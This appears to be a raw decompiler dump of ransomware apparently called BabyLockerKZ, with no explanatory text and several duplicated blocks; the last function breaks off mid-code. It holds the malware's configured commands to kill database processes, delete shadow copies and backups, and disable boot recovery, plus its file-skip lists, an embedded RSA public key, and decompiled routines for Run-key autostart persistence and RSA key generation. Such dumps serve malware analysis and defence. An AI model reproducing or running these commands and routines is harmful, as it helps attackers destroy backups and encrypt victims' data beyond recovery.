debug055:00000223EA917C19 db '"taskkill -f -im msmdsrv.exe",',0Ah
debug055:00000223EA917C38 db '"taskkill -f -im MsDtsSrvr.exe",',0Ah
debug055:00000223EA917C59 db '"taskkill -f -im sqlceip.exe",',0Ah
debug055:00000223EA917C78 db '"taskkill -f -im fdlauncher.exe",',0Ah
debug055:00000223EA917C9A db '"taskkill -f -im Ssms.exe",',0Ah
debug055:00000223EA917CB6 db '"taskkill -f -im SQLAGENT.EXE",',0Ah
debug055:00000223EA917CD6 db '"taskkill -f -im fdhost.exe",',0Ah
debug055:00000223EA917CF4 db '"taskkill -f -im ReportingServicesService.exe",',0Ah
debug055:00000223EA917D24 db '"taskkill -f -im msftesql.exe",',0Ah
debug055:00000223EA917D44 db '"taskkill -f -im pg_ctl.exe",',0Ah
debug055:00000223EA917D62 db '"taskkill -f -impostgres.exe",',0Ah
debug055:00000223EA917D81 db '"net stop MSSQLServerADHelper100",',0Ah
debug055:00000223EA917DA4 db '"net stop MSSQL$ISARS",',0Ah
debug055:00000223EA917DBC db '"net stop MSSQL$MSFW",',0Ah
debug055:00000223EA917DD3 db '"net stop SQLAgent$ISARS",',0Ah
debug055:00000223EA917DEE db '"net stop SQLAgent$MSFW",',0Ah
debug055:00000223EA917E08 db '"net stop SQLBrowser",',0Ah
debug055:00000223EA917E1F db '"net stop REportServer$ISARS",',0Ah
debug055:00000223EA917E3E db '"net stop SQLWriter",',0Ah
debug055:00000223EA917E54 db '"vssadmin.exe Delete Shadows /All /Quiet",',0Ah
debug055:00000223EA917E7F db '"wbadmin delete backup -keepVersion:0 -quiet",',0Ah
debug055:00000223EA917EAE db '"wbadmin DELETE SYSTEMSTABACKUP -deleteOldest",',0Ah
debug055:00000223EA917EDE db '"wmic.exe SHADOWCOPY /nointeractive",',0Ah
debug055:00000223EA917F04 db '"bcdedit.exe /set {default} recoverynabled No",',0Ah
debug055:00000223EA917F34 db '"bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"',0Ah
debug055:00000223EA917F74 db '],',0Ah
debug055:00000223EA917F77 db '"vecProgramFilesPath": [',0Ah
debug055:00000223EA917F90 db '"\\Microsoft SQL Server\\",',0Ah
debug055:00000223EA917FAC db '"\\Microsoft SQL Server Management Studio 18\\"',0Ah
debug055:00000223EA917FDC db '],',0Ah
debug055:00000223EA917FDF db '"vecSkipFileExtensions": [',0Ah
debug055:00000223EA917FFA db '".exe",',0Ah
debug055:00000223EA918002 db '".dll",',0Ah
debug055:00000223EA91800A db '".sys",',0Ah
debug055:00000223EA918012 db '".ini",',0Ah
debug055:00000223EA91801A db '".rdp",',0Ah
debug055:00000223EA918022 db '".lnk",',0Ah
debug055:00000223EA91802A db '".bmp",',0Ah
debug055:00000223EA918032 db '".mov",',0Ah
debug055:00000223EA91803A db '".cab",',0Ah
debug055:00000223EA918042 db '".url",',0Ah
debug055:00000223EA91804A db '".vsix",',0Ah
debug055:00000223EA918053 db '".msi",',0Ah
debug055:00000223EA91805B db '".pyc",',0Ah
debug055:00000223EA918063 db '".pyd",',0Ah
debug055:00000223EA91806B db '".vdm",',0Ah
debug055:00000223EA918073 db '".json"',0Ah
debug055:00000223EA91807B db '],',0Ah
debug055:00000223EA91807E db '"vecSkipPaths": [',0Ah
debug055:00000223EA918090 db '"C:\\perflogs",',0Ah
debug055:00000223EA9180A0 db '"C:\\Intel",',0Ah
debug055:00000223EA9180AD db '"C:\\HP",',0Ah
debug055:00000223EA9180B7 db '"C:\\AMD",',0Ah
debug055:00000223EA9180C2 db '"C:\\Dell",',0Ah
debug055:00000223EA9180CE db '"C:\\Drivers",',0Ah
debug055:00000223EA9180DD db '"C:\\inetpub",',0Ah
debug055:00000223EA9180EC db '"B:\\Boot",',0Ah
debug055:00000223EA9180F8 db '"A:\\Boot",',0Ah
debug055:00000223EA918104 db '"B:\\EFI",',0Ah
debug055:00000223EA91810F db '"A:\\EFI",',0Ah
debug055:00000223EA91811A db '"C:\\ProgramData\\AnyDesk",',0Ah
debug055:00000223EA918136 db '":\\Boot",',0Ah
debug055:00000223EA918141 db '"\\appdata\\"',0Ah
debug055:00000223EA91814F db ']',0Ah,'}'
BgIAAACkAABSU0ExAAgAAAEAAQCxqoL0k0/YLfeTuPHXZiEZzVTcuPk5h0izy5IDOhdtaanwWwryebK7LqJH+fuVByE6iC/FcXp5ADHd8jFQ4Vc+QLUuVWTgkZ/tSNaK52ZEsMROdjSO29BPUNFWy9dLUKu8KmgmkBn51d4AajIox99fxyJ5YHAldMaw7JYMUi5M0THBvhEb2bjUIkQBlwpGyceOzdT/lKCL9nd6cknOiKEim/kyS59Mkw1yY8satLbB6G1DN48nEieAh258/c/leX4EFul6lhXo/MIdokzvEQRqu0w949BMybv2Eqo8/inevFo2yk3N/Eozq31gF5KiPxpy+Zgrz3mrC+nduwbPo830
BgIAAACkAABSU0ExAAgAAAEAAQCxqoL0k0/YLfeTuPHXZiEZzVTcuPk5h0izy5IDOhdtaanwWwryebK7LqJH+fuVByE6iC/FcXp5ADHd8jFQ4Vc+QLUuVWTgkZ/tSNaK52ZEsMROdjSO29BPUNFWy9dLUKu8KmgmkBn51d4AajIox99fxyJ5YHAldMaw7JYMUi5M0THBvhEb2bjUIkQBlwpGyceOzdT/lKCL9nd6cknOiKEim/kyS59Mkw1yY8satLbB6G1DN48nEieAh258/c/leX4EFul6lhXo/MIdokzvEQRqu0w949BMybv2Eqo8/inevFo2yk3N/Eozq31gF5KiPxpy+Zgrz3mrC+nduwbPo830
// Hidden C++ exception states: #wind=26
BOOL __fastcall sub_7FF6BE634AE0(const WCHAR **a1, __int64 a2)
{
  const WCHAR *v2; // rbp
  const WCHAR *v4; // rcx
  BOOL result; // eax
  BYTE *v6; // rdx
  char *v7; // rsi
  unsigned __int64 v8; // rcx
  BYTE *v9; // rax
  size_t v10; // rdi
  BOOL v11; // esi
  __int64 v12; // rbp
  BYTE *v13; // rdx
  unsigned __int64 v14; // rcx
  size_t v15; // rdi
  DWORD pcbBinary; // [rsp+60h] [rbp+8h] BYREF
 
  v2 = *a1;
  v4 = *a1;
  pcbBinary = 0;
  result = CryptStringToBinaryW(v4, 0, 1u, 0LL, &pcbBinary, 0LL, 0LL);
  if ( !result )
    return result;
  v6 = *(BYTE **)a2;
  v7 = *(char **)(a2 + 8);
  v8 = (unsigned __int64)&v7[-*(_QWORD *)a2];
  if ( pcbBinary >= v8 )
  {
    if ( pcbBinary <= v8 )
      goto LABEL_9;
    if ( (unsigned __int64)pcbBinary > *(_QWORD *)(a2 + 16) - (_QWORD)v6 )
    {
      sub_7FF6BE635790(a2, pcbBinary);
      goto LABEL_9;
    }
    v10 = pcbBinary - v8;
    memset(v7, 0, v10);
    v9 = (BYTE *)&v7[v10];
  }
  else
  {
    v9 = &v6[pcbBinary];
  }
  *(_QWORD *)(a2 + 8) = v9;
LABEL_9:
  result = CryptStringToBinaryW(v2, 0, 1u, *(BYTE **)a2, &pcbBinary, 0LL, 0LL);
  v11 = result;
  if ( result )
  {
    v12 = *(_QWORD *)(a2 + 8);
    v13 = *(BYTE **)a2;
    v14 = v12 - *(_QWORD *)a2;
    if ( pcbBinary >= v14 )
    {
      if ( pcbBinary > v14 )
      {
        if ( (unsigned __int64)pcbBinary <= *(_QWORD *)(a2 + 16) - (_QWORD)v13 )
        {
          v15 = pcbBinary - v14;
          memset(*(void **)(a2 + 8), 0, v15);
          *(_QWORD *)(a2 + 8) = v15 + v12;
        }
        else
        {
          sub_7FF6BE635790(a2, pcbBinary);
        }
      }
    }
    else
    {
      *(_QWORD *)(a2 + 8) = &v13[pcbBinary];
    }
    return v11;
  }
  return result;
}
// Hidden C++ exception states: #wind=26
BOOL __fastcall sub_7FF6BE634AE0(const WCHAR **a1, __int64 a2)
{
  const WCHAR *v2; // rbp
  const WCHAR *v4; // rcx
  BOOL result; // eax
  BYTE *v6; // rdx
  char *v7; // rsi
  unsigned __int64 v8; // rcx
  BYTE *v9; // rax
  size_t v10; // rdi
  BOOL v11; // esi
  __int64 v12; // rbp
  BYTE *v13; // rdx
  unsigned __int64 v14; // rcx
  size_t v15; // rdi
  DWORD pcbBinary; // [rsp+60h] [rbp+8h] BYREF
 
  v2 = *a1;
  v4 = *a1;
  pcbBinary = 0;
  result = CryptStringToBinaryW(v4, 0, 1u, 0LL, &pcbBinary, 0LL, 0LL);
  if ( !result )
    return result;
  v6 = *(BYTE **)a2;
  v7 = *(char **)(a2 + 8);
  v8 = (unsigned __int64)&v7[-*(_QWORD *)a2];
  if ( pcbBinary >= v8 )
  {
    if ( pcbBinary <= v8 )
      goto LABEL_9;
    if ( (unsigned __int64)pcbBinary > *(_QWORD *)(a2 + 16) - (_QWORD)v6 )
    {
      sub_7FF6BE635790(a2, pcbBinary);
      goto LABEL_9;
    }
    v10 = pcbBinary - v8;
    memset(v7, 0, v10);
    v9 = (BYTE *)&v7[v10];
  }
  else
  {
    v9 = &v6[pcbBinary];
  }
  *(_QWORD *)(a2 + 8) = v9;
LABEL_9:
  result = CryptStringToBinaryW(v2, 0, 1u, *(BYTE **)a2, &pcbBinary, 0LL, 0LL);
  v11 = result;
  if ( result )
  {
    v12 = *(_QWORD *)(a2 + 8);
    v13 = *(BYTE **)a2;
    v14 = v12 - *(_QWORD *)a2;
    if ( pcbBinary >= v14 )
    {
      if ( pcbBinary > v14 )
      {
        if ( (unsigned __int64)pcbBinary <= *(_QWORD *)(a2 + 16) - (_QWORD)v13 )
        {
          v15 = pcbBinary - v14;
          memset(*(void **)(a2 + 8), 0, v15);
          *(_QWORD *)(a2 + 8) = v15 + v12;
        }
        else
        {
          sub_7FF6BE635790(a2, pcbBinary);
        }
      }
    }
    else
    {
      *(_QWORD *)(a2 + 8) = &v13[pcbBinary];
    }
    return v11;
  }
  return result;
}
06 02 00 00 00 a4 00 00 52 53 41 31 00 08 00 00 01 00 01 00 b1 aa 82 f4 93 4f d8 2d f7 93 b8 f1 d7 66 21 19 cd 54 dc b8 f9 39 87 48 b3 cb 92 03 3a 17 6d 69 a9 f0 5b 0a f2 79 b2 bb 2e a2 47 f9 fb 95 07 21 3a 88 2f c5 71 7a 79 00 31 dd f2 31 50 e1 57 3e 40 b5 2e 55 64 e0 91 9f ed 48 d6 8a e7 66 44 b0 c4 4e 76 34 8e db d0 4f 50 d1 56 cb d7 4b 50 ab bc 2a 68 26 90 19 f9 d5 de 00 6a 32 28 c7 df 5f c7 22 79 60 70 25 74 c6 b0 ec 96 0c 52 2e 4c d1 31 c1 be 11 1b d9 b8 d4 22 44 01 97 0a 46 c9 c7 8e cd d4 ff 94 a0 8b f6 77 7a 72 49 ce 88 a1 22 9b f9 32 4b 9f 4c 93 0d 72 63 cb 1a b4 b6 c1 e8 6d 43 37 8f 27 12 27 80 87 6e 7c fd cf e5 79 7e 04 16 e9 7a 96 15 e8 fc c2 1d a2 4c ef 11 04 6a bb 4c 3d e3 d0 4c c9 bb f6 12 aa 3c fe 29 de bc 5a 36 ca 4d cd fc 4a 33 ab 7d 60 17 92 a2 3f 1a 72 f9 98 2b cf 79 ab 0b e9 dd bb 06 cf a3 cd f4
06 02 00 00 00 a4 00 00 52 53 41 31 00 08 00 00 01 00 01 00 b1 aa 82 f4 93 4f d8 2d f7 93 b8 f1 d7 66 21 19 cd 54 dc b8 f9 39 87 48 b3 cb 92 03 3a 17 6d 69 a9 f0 5b 0a f2 79 b2 bb 2e a2 47 f9 fb 95 07 21 3a 88 2f c5 71 7a 79 00 31 dd f2 31 50 e1 57 3e 40 b5 2e 55 64 e0 91 9f ed 48 d6 8a e7 66 44 b0 c4 4e 76 34 8e db d0 4f 50 d1 56 cb d7 4b 50 ab bc 2a 68 26 90 19 f9 d5 de 00 6a 32 28 c7 df 5f c7 22 79 60 70 25 74 c6 b0 ec 96 0c 52 2e 4c d1 31 c1 be 11 1b d9 b8 d4 22 44 01 97 0a 46 c9 c7 8e cd d4 ff 94 a0 8b f6 77 7a 72 49 ce 88 a1 22 9b f9 32 4b 9f 4c 93 0d 72 63 cb 1a b4 b6 c1 e8 6d 43 37 8f 27 12 27 80 87 6e 7c fd cf e5 79 7e 04 16 e9 7a 96 15 e8 fc c2 1d a2 4c ef 11 04 6a bb 4c 3d e3 d0 4c c9 bb f6 12 aa 3c fe 29 de bc 5a 36 ca 4d cd fc 4a 33 ab 7d 60 17 92 a2 3f 1a 72 f9 98 2b cf 79 ab 0b e9 dd bb 06 cf a3 cd f4
// Hidden C++ exception states: #wind=5
void __fastcall add_startup(__int64 a1, __int64 a2, __int64 a3, __int64 a4)
{
  const WCHAR *v4; // rdx
  unsigned int v5; // eax
  HKEY v6; // rbx
  WCHAR *v7; // rcx
  BYTE **v8; // r9
  BYTE *v9; // rdi
  unsigned __int64 v10; // rsi
  __int64 v11; // r10
  __int64 v12; // rcx
  int v13; // r11d
  const wchar_t *v14; // rax
  __int64 v15; // r9
  wchar_t v16; // dx
  BYTE **v17; // rdx
  BYTE *v18; // rcx
  BYTE **v19; // rax
  _QWORD *v20; // rax
  __int64 v21; // r9
  __int128 v22; // xmm6
  __int128 v23; // xmm7
  BYTE *v24; // rcx
  WCHAR *v25; // rcx
  const BYTE *v26; // rcx
  const WCHAR *v27; // rdx
  unsigned int v28; // eax
  WCHAR *v29; // rcx
  BYTE *v30; // rcx
  const char *v31; // rax
  LPCWSTR lpSubKey[2]; // [rsp+50h] [rbp-D8h] BYREF
  __m128i si128; // [rsp+60h] [rbp-C8h]
  BYTE *lpData[2]; // [rsp+70h] [rbp-B8h] BYREF
  __int64 v35[2]; // [rsp+80h] [rbp-A8h]
  const std::exception *v36; // [rsp+90h] [rbp-98h] BYREF
  _BYTE pExceptionObject[40]; // [rsp+98h] [rbp-90h] BYREF
  _BYTE v38[80]; // [rsp+C0h] [rbp-68h] BYREF
  HKEY hKey; // [rsp+130h] [rbp+8h] BYREF
 
  *(_OWORD *)lpSubKey = 0LL;
  si128 = 0LL;
  try
  {
    copy_str(lpSubKey, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0x2DuLL, a4);
    hKey = 0LL;
    v4 = (const WCHAR *)lpSubKey;
    if ( si128.m128i_i64[1] > 7uLL )
      v4 = lpSubKey[0];
    v5 = RegCreateKeyExW(HKEY_CURRENT_USER, v4, 0, 0LL, 0, 2u, 0LL, &hKey, 0LL);
    if ( v5 )
    {
      error_printf(pExceptionObject, v5, "RegCreateKeyExW failed.");
      throw (winreg::RegException *)pExceptionObject;
    }
    v6 = hKey;
    if ( si128.m128i_i64[1] > 7uLL )
    {
      v7 = (WCHAR *)lpSubKey[0];
      if ( (unsigned __int64)(2 * si128.m128i_i64[1] + 2) >= 0x1000 )
      {
        v7 = (WCHAR *)*((_QWORD *)lpSubKey[0] - 1);
        if ( (unsigned __int64)((char *)lpSubKey[0] - (char *)v7 - 8) > 0x1F )
          invalid_parameter_noinfo_noreturn();
      }
      j_j_free(v7);
    }
    si128 = _mm_load_si128((const __m128i *)&xmmword_7FF6BE6790D0);
    LOWORD(lpSubKey[0]) = 0;
    if ( v6 )
    {
      sub_7FF6BE6221C0((__int64)lpData, (__int64)&qword_7FF6BE683D48);
      v8 = lpData;
      v9 = lpData[0];
      v10 = v35[1];
      if ( v35[1] > 7uLL )
        v8 = (BYTE **)lpData[0];
      v11 = v35[0];
      if ( v35[0] >= 4uLL )
      {
        v12 = 4LL;
        v13 = 0;
        v14 = L"\\\\?\\";
        v15 = (char *)v8 - (char *)L"\\\\?\\";
        while ( 1 )
        {
          v16 = *(const wchar_t *)((char *)v14 + v15);
          if ( v16 != *v14 )
            break;
          ++v14;
          if ( !--v12 )
            goto LABEL_19;
        }
        v13 = 1;
        if ( v16 < *v14 )
          v13 = -1;
LABEL_19:
        if ( !v13 )
        {
          *(_OWORD *)lpSubKey = 0LL;
          si128 = 0LL;
          v17 = lpData;
          if ( v35[1] > 7uLL )
            v17 = (BYTE **)lpData[0];
          copy_str(lpSubKey, v17 + 1, v35[0] - 4, v15);
          if ( v35[1] > 7uLL )
          {
            v18 = lpData[0];
            if ( (unsigned __int64)(2 * v35[1] + 2) >= 0x1000 )
            {
              v18 = (BYTE *)*((_QWORD *)lpData[0] - 1);
              if ( (unsigned __int64)(lpData[0] - v18 - 8) > 0x1F )
                invalid_parameter_noinfo_noreturn();
            }
            j_j_free(v18);
          }
          *(_OWORD *)lpData = *(_OWORD *)lpSubKey;
          *(__m128i *)v35 = si128;
          v10 = _mm_srli_si128(si128, 8).m128i_u64[0];
          v11 = si128.m128i_i64[0];
          v9 = (BYTE *)lpSubKey[0];
        }
      }
      if ( v11 == 0x7FFFFFFFFFFFFFFELL )
        unknown_libname_3();
      v19 = lpData;
      if ( v10 > 7 )
        v19 = (BYTE **)v9;
      sub_7FF6BE628A80(lpSubKey, 1LL, v19, v11);
      v20 = sub_7FF6BE626470(lpSubKey, L"\"", 1uLL);
      v22 = *(_OWORD *)v20;
      v23 = *((_OWORD *)v20 + 1);
      v20[2] = 0LL;
      v20[3] = 7LL;
      *(_WORD *)v20 = 0;
      if ( v35[1] > 7uLL )
      {
        v24 = lpData[0];
        if ( (unsigned __int64)(2 * v35[1] + 2) >= 0x1000 )
        {
          v24 = (BYTE *)*((_QWORD *)lpData[0] - 1);
          if ( (unsigned __int64)(lpData[0] - v24 - 8) > 0x1F )
            invalid_parameter_noinfo_noreturn();
        }
        j_j_free(v24);
      }
      *(_OWORD *)lpData = v22;
      *(_OWORD *)v35 = v23;
      if ( si128.m128i_i64[1] > 7uLL )
      {
        v25 = (WCHAR *)lpSubKey[0];
        if ( (unsigned __int64)(2 * si128.m128i_i64[1] + 2) >= 0x1000 )
        {
          v25 = (WCHAR *)*((_QWORD *)lpSubKey[0] - 1);
          if ( (unsigned __int64)((char *)lpSubKey[0] - (char *)v25 - 8) > 0x1F )
            invalid_parameter_noinfo_noreturn();
        }
        j_j_free(v25);
      }
      *(_OWORD *)lpSubKey = 0LL;
      si128 = 0LL;
      copy_str(lpSubKey, L"BabyLockerKZ", 0xCuLL, v21);
      v26 = (const BYTE *)lpData;
      if ( v35[1] > 7uLL )
        v26 = lpData[0];
      v27 = (const WCHAR *)lpSubKey;
      if ( si128.m128i_i64[1] > 7uLL )
        v27 = lpSubKey[0];
      v28 = RegSetValueExW(v6, v27, 0, 1u, v26, 2 * LODWORD(v35[0]) + 2);
      if ( v28 )
      {
        error_printf(v38, v28, "Cannot write string value: RegSetValueExW failed.");
        throw (winreg::RegException *)v38;
      }
      if ( si128.m128i_i64[1] > 7uLL )
      {
        v29 = (WCHAR *)lpSubKey[0];
        if ( (unsigned __int64)(2 * si128.m128i_i64[1] + 2) >= 0x1000 )
        {
          v29 = (WCHAR *)*((_QWORD *)lpSubKey[0] - 1);
          if ( (unsigned __int64)((char *)lpSubKey[0] - (char *)v29 - 8) > 0x1F )
            invalid_parameter_noinfo_noreturn();
        }
        j_j_free(v29);
      }
      printf("[+] Program added to autostart successfully.\n");
      if ( v35[1] > 7uLL )
      {
        v30 = lpData[0];
        if ( (unsigned __int64)(2 * v35[1] + 2) >= 0x1000 )
        {
          v30 = (BYTE *)*((_QWORD *)lpData[0] - 1);
          if ( (unsigned __int64)(lpData[0] - v30 - 8) > 0x1F )
            invalid_parameter_noinfo_noreturn();
        }
        j_j_free(v30);
      }
    }
    if ( v6
      && (unsigned __int64)(v6 + 0x20000000) > 5
      && v6 != HKEY_CURRENT_USER_LOCAL_SETTINGS
      && v6 != HKEY_PERFORMANCE_NLSTEXT
      && v6 != HKEY_PERFORMANCE_TEXT )
    {
      RegCloseKey(v6);
    }
  }
  catch ( const std::exception *v36 )
  {
    v31 = (const char *)(*(__int64 (__fastcall **)(const std::exception *))(*(_QWORD *)v36 + 8LL))(v36);
    printf("[!] Exception in %s: %s\n", "Context::Autostart", v31);
  }
}
// Hidden C++ exception states: #wind=5
void __fastcall add_startup(__int64 a1, __int64 a2, __int64 a3, __int64 a4)
{
  const WCHAR *v4; // rdx
  unsigned int v5; // eax
  HKEY v6; // rbx
  WCHAR *v7; // rcx
  BYTE **v8; // r9
  BYTE *v9; // rdi
  unsigned __int64 v10; // rsi
  __int64 v11; // r10
  __int64 v12; // rcx
  int v13; // r11d
  const wchar_t *v14; // rax
  __int64 v15; // r9
  wchar_t v16; // dx
  BYTE **v17; // rdx
  BYTE *v18; // rcx
  BYTE **v19; // rax
  _QWORD *v20; // rax
  __int64 v21; // r9
  __int128 v22; // xmm6
  __int128 v23; // xmm7
  BYTE *v24; // rcx
  WCHAR *v25; // rcx
  const BYTE *v26; // rcx
  const WCHAR *v27; // rdx
  unsigned int v28; // eax
  WCHAR *v29; // rcx
  BYTE *v30; // rcx
  const char *v31; // rax
  LPCWSTR lpSubKey[2]; // [rsp+50h] [rbp-D8h] BYREF
  __m128i si128; // [rsp+60h] [rbp-C8h]
  BYTE *lpData[2]; // [rsp+70h] [rbp-B8h] BYREF
  __int64 v35[2]; // [rsp+80h] [rbp-A8h]
  const std::exception *v36; // [rsp+90h] [rbp-98h] BYREF
  _BYTE pExceptionObject[40]; // [rsp+98h] [rbp-90h] BYREF
  _BYTE v38[80]; // [rsp+C0h] [rbp-68h] BYREF
  HKEY hKey; // [rsp+130h] [rbp+8h] BYREF
 
  *(_OWORD *)lpSubKey = 0LL;
  si128 = 0LL;
  try
  {
    copy_str(lpSubKey, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0x2DuLL, a4);
    hKey = 0LL;
    v4 = (const WCHAR *)lpSubKey;
    if ( si128.m128i_i64[1] > 7uLL )
      v4 = lpSubKey[0];
    v5 = RegCreateKeyExW(HKEY_CURRENT_USER, v4, 0, 0LL, 0, 2u, 0LL, &hKey, 0LL);
    if ( v5 )
    {
      error_printf(pExceptionObject, v5, "RegCreateKeyExW failed.");
      throw (winreg::RegException *)pExceptionObject;
    }
    v6 = hKey;
    if ( si128.m128i_i64[1] > 7uLL )
    {
      v7 = (WCHAR *)lpSubKey[0];
      if ( (unsigned __int64)(2 * si128.m128i_i64[1] + 2) >= 0x1000 )
      {
        v7 = (WCHAR *)*((_QWORD *)lpSubKey[0] - 1);
        if ( (unsigned __int64)((char *)lpSubKey[0] - (char *)v7 - 8) > 0x1F )
          invalid_parameter_noinfo_noreturn();
      }
      j_j_free(v7);
    }
    si128 = _mm_load_si128((const __m128i *)&xmmword_7FF6BE6790D0);
    LOWORD(lpSubKey[0]) = 0;
    if ( v6 )
    {
      sub_7FF6BE6221C0((__int64)lpData, (__int64)&qword_7FF6BE683D48);
      v8 = lpData;
      v9 = lpData[0];
      v10 = v35[1];
      if ( v35[1] > 7uLL )
        v8 = (BYTE **)lpData[0];
      v11 = v35[0];
      if ( v35[0] >= 4uLL )
      {
        v12 = 4LL;
        v13 = 0;
        v14 = L"\\\\?\\";
        v15 = (char *)v8 - (char *)L"\\\\?\\";
        while ( 1 )
        {
          v16 = *(const wchar_t *)((char *)v14 + v15);
          if ( v16 != *v14 )
            break;
          ++v14;
          if ( !--v12 )
            goto LABEL_19;
        }
        v13 = 1;
        if ( v16 < *v14 )
          v13 = -1;
LABEL_19:
        if ( !v13 )
        {
          *(_OWORD *)lpSubKey = 0LL;
          si128 = 0LL;
          v17 = lpData;
          if ( v35[1] > 7uLL )
            v17 = (BYTE **)lpData[0];
          copy_str(lpSubKey, v17 + 1, v35[0] - 4, v15);
          if ( v35[1] > 7uLL )
          {
            v18 = lpData[0];
            if ( (unsigned __int64)(2 * v35[1] + 2) >= 0x1000 )
            {
              v18 = (BYTE *)*((_QWORD *)lpData[0] - 1);
              if ( (unsigned __int64)(lpData[0] - v18 - 8) > 0x1F )
                invalid_parameter_noinfo_noreturn();
            }
            j_j_free(v18);
          }
          *(_OWORD *)lpData = *(_OWORD *)lpSubKey;
          *(__m128i *)v35 = si128;
          v10 = _mm_srli_si128(si128, 8).m128i_u64[0];
          v11 = si128.m128i_i64[0];
          v9 = (BYTE *)lpSubKey[0];
        }
      }
      if ( v11 == 0x7FFFFFFFFFFFFFFELL )
        unknown_libname_3();
      v19 = lpData;
      if ( v10 > 7 )
        v19 = (BYTE **)v9;
      sub_7FF6BE628A80(lpSubKey, 1LL, v19, v11);
      v20 = sub_7FF6BE626470(lpSubKey, L"\"", 1uLL);
      v22 = *(_OWORD *)v20;
      v23 = *((_OWORD *)v20 + 1);
      v20[2] = 0LL;
      v20[3] = 7LL;
      *(_WORD *)v20 = 0;
      if ( v35[1] > 7uLL )
      {
        v24 = lpData[0];
        if ( (unsigned __int64)(2 * v35[1] + 2) >= 0x1000 )
        {
          v24 = (BYTE *)*((_QWORD *)lpData[0] - 1);
          if ( (unsigned __int64)(lpData[0] - v24 - 8) > 0x1F )
            invalid_parameter_noinfo_noreturn();
        }
        j_j_free(v24);
      }
      *(_OWORD *)lpData = v22;
      *(_OWORD *)v35 = v23;
      if ( si128.m128i_i64[1] > 7uLL )
      {
        v25 = (WCHAR *)lpSubKey[0];
        if ( (unsigned __int64)(2 * si128.m128i_i64[1] + 2) >= 0x1000 )
        {
          v25 = (WCHAR *)*((_QWORD *)lpSubKey[0] - 1);
          if ( (unsigned __int64)((char *)lpSubKey[0] - (char *)v25 - 8) > 0x1F )
            invalid_parameter_noinfo_noreturn();
        }
        j_j_free(v25);
      }
      *(_OWORD *)lpSubKey = 0LL;
      si128 = 0LL;
      copy_str(lpSubKey, L"BabyLockerKZ", 0xCuLL, v21);
      v26 = (const BYTE *)lpData;
      if ( v35[1] > 7uLL )
        v26 = lpData[0];
      v27 = (const WCHAR *)lpSubKey;
      if ( si128.m128i_i64[1] > 7uLL )
        v27 = lpSubKey[0];
      v28 = RegSetValueExW(v6, v27, 0, 1u, v26, 2 * LODWORD(v35[0]) + 2);
      if ( v28 )
      {
        error_printf(v38, v28, "Cannot write string value: RegSetValueExW failed.");
        throw (winreg::RegException *)v38;
      }
      if ( si128.m128i_i64[1] > 7uLL )
      {
        v29 = (WCHAR *)lpSubKey[0];
        if ( (unsigned __int64)(2 * si128.m128i_i64[1] + 2) >= 0x1000 )
        {
          v29 = (WCHAR *)*((_QWORD *)lpSubKey[0] - 1);
          if ( (unsigned __int64)((char *)lpSubKey[0] - (char *)v29 - 8) > 0x1F )
            invalid_parameter_noinfo_noreturn();
        }
        j_j_free(v29);
      }
      printf("[+] Program added to autostart successfully.\n");
      if ( v35[1] > 7uLL )
      {
        v30 = lpData[0];
        if ( (unsigned __int64)(2 * v35[1] + 2) >= 0x1000 )
        {
          v30 = (BYTE *)*((_QWORD *)lpData[0] - 1);
          if ( (unsigned __int64)(lpData[0] - v30 - 8) > 0x1F )
            invalid_parameter_noinfo_noreturn();
        }
        j_j_free(v30);
      }
    }
    if ( v6
      && (unsigned __int64)(v6 + 0x20000000) > 5
      && v6 != HKEY_CURRENT_USER_LOCAL_SETTINGS
      && v6 != HKEY_PERFORMANCE_NLSTEXT
      && v6 != HKEY_PERFORMANCE_TEXT )
    {
      RegCloseKey(v6);
    }
  }
  catch ( const std::exception *v36 )
  {
    v31 = (const char *)(*(__int64 (__fastcall **)(const std::exception *))(*(_QWORD *)v36 + 8LL))(v36);
    printf("[!] Exception in %s: %s\n", "Context::Autostart", v31);
  }
}
__int64 __fastcall sub_7FF6BE634C20(__int64 a1, __int64 a2)
{
  unsigned int v2; // ebx
  char *v3; // rdi
  BYTE *v4; // rax
  size_t v5; // rbx
  char *v6; // rdi
  BYTE *v7; // rax
  size_t v8; // rbx
  DWORD v10; // [rsp+50h] [rbp+8h] BYREF
  int v11; // [rsp+54h] [rbp+Ch]
  DWORD pdwDataLen; // [rsp+58h] [rbp+10h] BYREF
  int v13; // [rsp+5Ch] [rbp+14h]
  HCRYPTKEY phKey; // [rsp+60h] [rbp+18h] BYREF
  HCRYPTPROV hProv; // [rsp+68h] [rbp+20h] BYREF
 
  v13 = HIDWORD(a2);
  v11 = HIDWORD(a1);
  pdwDataLen = 0;
  v10 = 0;
  hProv = 0LL;
  phKey = 0LL;
  v2 = CryptAcquireContextW(&hProv, 0LL, 0LL, 1u, 0xF0000040);//初始化RSA加密对象
  if ( !v2 )
    goto LABEL_21;
  v2 = CryptGenKey(hProv, 1u, 0x8000001u, &phKey); //生成RSA密钥对
  if ( !v2 )
    goto LABEL_21;
  v2 = CryptExportKey(phKey, 0LL, 6u, 0, 0LL, &pdwDataLen);
  if ( !v2 )
    goto LABEL_21;
  v3 = (char *)xmmword_7FF6BE683E58;
  if ( pdwDataLen < (unsigned __int64)((_BYTE *)xmmword_7FF6BE683E58 - pbData) )
  {
    v4 = &pbData[pdwDataLen];
LABEL_10:
    xmmword_7FF6BE683E58 = v4;
    goto LABEL_11;
  }
  if ( pdwDataLen > (unsigned __int64)((_BYTE *)xmmword_7FF6BE683E58 - pbData) )
  {
    if ( pdwDataLen <= (unsigned __int64)((_BYTE *)*(&xmmword_7FF6BE683E58 + 1) - pbData) )
    {
      v5 = pdwDataLen - ((_BYTE *)xmmword_7FF6BE683E58 - pbData);
      memset(xmmword_7FF6BE683E58, 0, v5);
      v4 = (BYTE *)&v3[v5];
      goto LABEL_10;
    }
    sub_7FF6BE635790((__int64)&pbData, pdwDataLen);
  }
LABEL_11:
  v2 = CryptExportKey(phKey, 0LL, 6u, 0, pbData, &pdwDataLen);
  if ( v2 )
  {
    v2 = CryptExportKey(phKey, 0LL, 7u, 0, 0LL, &v10);
    if ( v2 )
    {
      v6 = (char *)xmmword_7FF6BE683CE8;
      if ( v10 < (unsigned __int64)((_BYTE *)xmmword_7FF6BE683CE8 - Src) )
      {
        v7 = &Src[v10];
LABEL_19:
        xmmword_7FF6BE683CE8 = v7;
        goto LABEL_20;
      }
      if ( v10 > (unsigned __int64)((_BYTE *)xmmword_7FF6BE683CE8 - Src) )
      {
